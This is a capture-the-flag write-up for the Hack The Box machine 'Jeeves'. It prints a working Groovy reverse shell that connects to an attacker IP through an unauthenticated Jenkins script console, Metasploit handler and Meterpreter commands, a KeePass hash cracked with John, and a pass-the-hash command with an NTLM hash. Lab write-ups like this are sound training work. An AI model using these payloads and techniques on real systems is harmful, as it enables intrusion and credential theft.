Hack The Box - Jeeves

5 minute read

JeevesImage


Summary


Jeeves showed us that an unauthenticated Jenkins server can easily lead to a reverse shell through Groovy Script even if the web-directory is unknown. It highlighted not only this issue but problems with weak KeePass passwords leading to a complete system compromise, even if you’ve only stored a password hash and have hidden your sensitive information in an Alternate Data Stream.

Gaining Access

  • Locate Jetty and 404 page
  • Enumerate Jenkins service
  • Execute reverse shell groovy script

Elevating Privileges

  • Locate CEH KeePass file
  • Upgrade to Meterpreter and download CEH.kdbx
  • Get hash of CEH file for cracking
  • Crack KeePass hash and view contents
  • Relay hash using pass the hash toolkit
  • View alternate data stream

Write-up


Enumeration

First up I enumerated open ports using Masscan.

root@mintsec:~/Desktop/machines/Jeeves# masscan -e tun0 -p0-65535 --rate 700 -oL scan 10.10.10.63
Discovered open port 80/tcp on 10.10.10.63
Discovered open port 135/tcp on 10.10.10.63
Discovered open port 445/tcp on 10.10.10.63
Discovered open port 50000/tcp on 10.10.10.63

I then drilled in further with nmap to fingerprint what services were running.

root@mintsec:~/Desktop/machines/Jeeves# nmap -sV -p 80,135,445,50000 -sS 10.10.10.63
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Locate Jetty and 404 page

Viewing the http service running on port 80 I was greeted by an old school “Ask Jeeves” page.

AskJeeves

Attempting to search for anything threw a fake error page in the form of a picture.

FakeError

Figuring this may be a rabbit hole I looked into the Jetty service which was running.

404Page

Enumerate Jenkins service

Interesting, I setup a couple of gobuster instances to try and find any interesting directories on both the Jetty page and the IIS webpage in case I’d missed anything.

gobuster -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This revealed a new lead, the askjeeves directory within the Jetty web application.

/askjeeves (Status: 302)

Execute reverse shell groovy script

Within this directory there was a Jenkins web interface which required no authentication, excellent. I noticed this had a section to “Manage Jenkins” which then had a “Script Console”.

ManageJenkins

http://10.10.10.63:50000/askjeeves/script

GroovyScript

A quick search told me that Jenkins used something known as ‘Groovy Script’ and that a nice reverse shell had already been created for Groovy Script.

First I setup a listener using metasploit.

msfconsole
use exploit/multi/handler/
set LPORT 8080
set LHOST 10.10.12.154
exploit

I then modified the reverse shell to connect back to my IP on port 8080.

String host="10.10.12.154";
int port=8080;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Gaining Access

I ran this through the Script Console, at which point I’d got a reverse shell and could read user.txt


User.txt: e3232…7066a


Locate CEH KeePass file

looking around the file system I found a file called CEH.kdbx under /Users/kohsuke/Documents/. The kdbx file was a KeePass database file, and wanting to try and crack it I needed to get it onto my host machine.

Upgrade to Meterpreter and download CEH.kdbx

With my standard shell I backgrounded the session and upgraded it by spawning a new Meterpreter shell session.

CTRL+Z
sessions -u 1

This worked the same as if I had of done.

CTRL+Z
use post/multi/manage/shell_to_meterpreter
set session 1
exploit

At this point I was able to download the CEH KeePass file using the inbuilt Meterpreter functionality.

download /Users/kohsuke/Documents/CEH.kdbx

Get hash of CEH file for cracking

Using Keepass2John I was able to get a hash which could be cracked with John The Ripper AKA John.

root@mintsec:~/Desktop/machines/Jeeves# keepass2john CEH.kdbx 
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

I saved this to a file called kdbxhash.txt for cracking.

Crack KeePass hash and view contents

I, like many others decided to use the classic rockyou.txt list to crack the hash. If you don’t know about this list or the company RockYou take a look at this Wikipedia Page. RockYou was an application developer for popular social networking sites, and rockyou.txt is essentially a large, unaltered list of passwords stolen from one of their SQL Databases using “A 10-year-old SQL vulnerability”. The passwords were stored in plaintext making this one of the most popular and widely used password lists in existance to date.

Using John and rockyou.txt it was trivial to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt kdbxhash.txt 

moonshine1 (CEH)

Victory. A password. I used this to open the CEH.kdbx using KeePass on my Windows OS, and checked to see if there was anything of interest.

CEHPasswords

Relay hash using pass the hash toolkit

Looking into the passwords, most were pretty usual; however, I did find that one of the passwords called “Backup stuff” which looked like a hash. Given ports 135 and 445 were open on this box it was entirely possible that passing this hash was what was required to gain elevated access. I performed this using the ‘Pass the hash toolkit’ in particular the pth-winexe module to authenticate with system level privileges.

root@mintsec:~/Desktop/machines/Jeeves# pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

And you wouldn’t believe it…I now had system level access.

View alternate data stream

Looking into the standard directory for root.txt I came up only with a file called hm.txt

type C:\Users\Administrator\Desktop\hm.txt

The flag is elsewhere. Look deeper

Hmmm strange, given this is where the root.txt file was supposed to be and it wanted me to “look deeper” I checked to see if this had an Alternate Data Stream. The OWASP page at the time of writing is a bit dated (01/19/2011) and cites: “This is not a well known feature”, and “Windows Explorer doesn’t provide a way of seing what alternate data streams are in a file”. Whilst possibly still accurate I’d argue that Alternate Data Streams are far more known now than they were in 2011, and although you may not be able to see them in Windows Explorer, you can certainly see them through the Windows Command Prompt or PowerShell.

Using the shell I had I viewed alternate data streams using the /R switch of the directory command.

dir /R

34 hm.txt:root.txt:$DATA

Now I knew there was an alternate data stream containing the flag. I piped this stream as an input to the “more” command which allowed me to view the flag and successfully compromise this system.

more < hm.txt:root.txt

Elevating Privileges


root.txt: afbc5…92530


Final Notes

At the time of writing other HTB members had rated the machine elements as shown below. Feel free to reach out and provide any feedback or let me know if this helped.

Heatmap